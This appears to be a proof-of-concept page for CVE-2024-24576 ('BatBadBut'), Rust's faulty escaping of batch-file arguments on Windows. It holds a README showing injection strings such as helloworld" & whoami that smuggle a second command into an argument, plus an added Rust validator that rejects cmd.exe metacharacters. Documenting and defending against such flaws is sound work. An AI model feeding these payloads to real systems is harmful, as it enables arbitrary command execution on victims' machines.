CVE-2024-24576 PoC — Rust security vulnerability

Source
Associated Vulnerability
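Title: Rust security vulnerability (CVE-2024-24576)
Description: Rust is a general-purpose, compiled programming language from the Mozilla Foundation (US). Versions of Rust before 1.77.2 contain a security vulnerability caused by arguments to batch files on Windows not being escaped correctly; an attacker can bypass the escaping to execute arbitrary shell commands.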
Description
PoC for CVE-2024-24576 vulnerability "BatBadBut"
Readme
# CVE-2024-24576-PoC-BatBadBut

PoC for CVE-2024-24576 vulnerability "BatBadBut"

## Information

After you run the script, it asks you for an argument, which is passed to the bat file. If you close the argument with `"` and follow it with `&`, you can run any Windows command.
For example:
```cmd
helloworld" & whoami
```

As a result, the `whoami` command runs and you get its output.

Of course, in a real scenario it would not look like this; this is just a PoC for the CVE.
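
A defensive check for the injection described above, as an added example that is not part of the original PoC repository: it rejects arguments containing cmd.exe metacharacters before they are handed to a batch file. The function names, the error type and the character list are assumptions of this sketch, and it complements rather than replaces upgrading to Rust 1.77.2 or later.

```rust
use std::path::Path;

/// Characters that can change how cmd.exe re-parses a batch file's command line
/// (list chosen for this example; stricter allowlists are also reasonable).
const CMD_META: &[char] = &['"', '&', '|', '<', '>', '^', '%', '!', '(', ')'];

#[derive(Debug, PartialEq)]
pub enum ArgError {
    /// Argument `index` contains the metacharacter or control character `ch`.
    Unsafe { index: usize, ch: char },
}

/// True when the target may be run through cmd.exe: a .bat/.cmd extension in
/// any case, or no extension at all (treated as ambiguous in this example).
/// Trailing dots and spaces are trimmed because Windows ignores them in names.
pub fn is_batch_target(program: &str) -> bool {
    let trimmed = program.trim_end_matches(['.', ' ']);
    match Path::new(trimmed).extension().and_then(|e| e.to_str()) {
        Some(ext) => ext.eq_ignore_ascii_case("bat") || ext.eq_ignore_ascii_case("cmd"),
        None => true,
    }
}

/// Refuse any argument that could break out of its quoting in a batch invocation.
pub fn check_batch_args(program: &str, args: &[&str]) -> Result<(), ArgError> {
    if !is_batch_target(program) {
        return Ok(()); // not routed through cmd.exe, normal argv rules apply
    }
    for (index, arg) in args.iter().enumerate() {
        if let Some(ch) = arg.chars().find(|c| CMD_META.contains(c) || c.is_control()) {
            return Err(ArgError::Unsafe { index, ch });
        }
    }
    Ok(())
}

fn main() {
    // Constructed inputs; the second is the example string from this README.
    for arg in ["helloworld", "helloworld\" & whoami"] {
        match check_batch_args("poc.bat", &[arg]) {
            Ok(()) => println!("accept {:?}", arg),
            Err(e) => println!("reject {:?}: {:?}", arg, e),
        }
    }
}
```

Call `check_batch_args` before building the `std::process::Command`, and fail the request instead of trying to sanitize the rejected argument.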

## Usage

Clone the repository:
```cmd
git clone https://github.com/SheL3G/CVE-2024-24576-PoC-BatBadBut.git
```

Running the script:
```cmd
python CVE-2024-24576.py
```
To make it work, type something, close it with `"`, then add `&` and any command, such as calc.exe, hostname or whoami:
```cmd
HelloWorld" & hostname
```
The flow of the CVE and the possible way to make it work:
![Flow](https://flatt.tech/research/batbadbut-you-cant-securely-execute-commands-on-windows/flowchart.svg)

## Credits

* [NIST](https://nvd.nist.gov/vuln/detail/CVE-2024-24576)

* [flatt.tech](https://flatt.tech/research/posts/batbadbut-you-cant-securely-execute-commands-on-windows/)

* [Mental Outlaw](https://www.youtube.com/watch?v=jqsoSmOBFrQ)

## License

[MIT](https://choosealicense.com/licenses/mit/)
File Snapshot

```
[4.0K] /data/pocs/8e60c7f609ecbbc2ca654b6b3194029e31b71030
├── [1.1K] CVE-2024-24576.py
├── [1.0K] LICENSE
├── [ 36] poc.bat
└── [1.2K] README.md

0 directories, 4 files
```